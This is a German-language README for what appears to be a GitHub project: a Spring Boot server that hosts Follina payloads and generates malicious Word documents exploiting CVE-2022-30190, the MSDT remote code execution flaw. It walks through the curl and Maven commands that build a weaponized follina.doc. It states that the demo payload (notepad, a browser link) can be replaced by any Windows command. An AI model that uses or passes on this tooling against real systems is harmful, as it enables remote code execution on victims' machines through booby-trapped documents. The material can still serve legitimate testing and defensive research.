
Server zum Hosten/Aktivieren von Follina-Payloads & Generator für schädliche Word-Dokumente, die das MS-MSDT-Protokoll ausnutzen. (CVE-2022-30190)
Dieses Repository enthält eine einfache Spring Boot-Anwendung, die sowohl als Server zum Hosten/Aktivieren von Follina-Payloads als auch als Generator für bösartige Word-Dokumente dient, die als Angriffsvektoren zur Ausnutzung von CVE-2022-30190 verwendet werden können.
Diese Schwachstelle besteht aus Remote Code Execution über MSDT (Microsoft Windows Support Diagnostic Tool).
Um einen eindeutigen Payload Ihrer Wahl bereitzustellen, sollten Sie:
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
Wenn Sie den aktuellen Payload ändern möchten, müssen Sie zuerst den derzeit aktiven Server herunterfahren und die Schritte nach dem Definieren des neueren Payloads wiederholen.
HINWEIS: Der Payload kann durch jeden anderen Befehl ersetzt werden, solange er über die Windows-CMD ausgeführt werden kann.
Um einen clientseitigen Payload Ihrer Wahl bereitzustellen, sollten Sie:
mvn spring-boot:run
cmd angeben, z. B.:curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
Der Payload ist in diesem Fall im Dokument eingebettet und muss lediglich durch Kontaktaufnahme mit dem Server aktiviert werden. Auf diese Weise können Sie mehrere verschiedene Payloads auf verschiedene Dokumente verteilen und müssen den Server nicht neu starten, um Payload-Änderungen auszulösen – Sie können einfach ein neues Dokument mit dem gewünschten eingebetteten Payload generieren.
Vielen Dank an John Hammond für die Python-Implementierung und das Teilen seiner Analyse der CVE.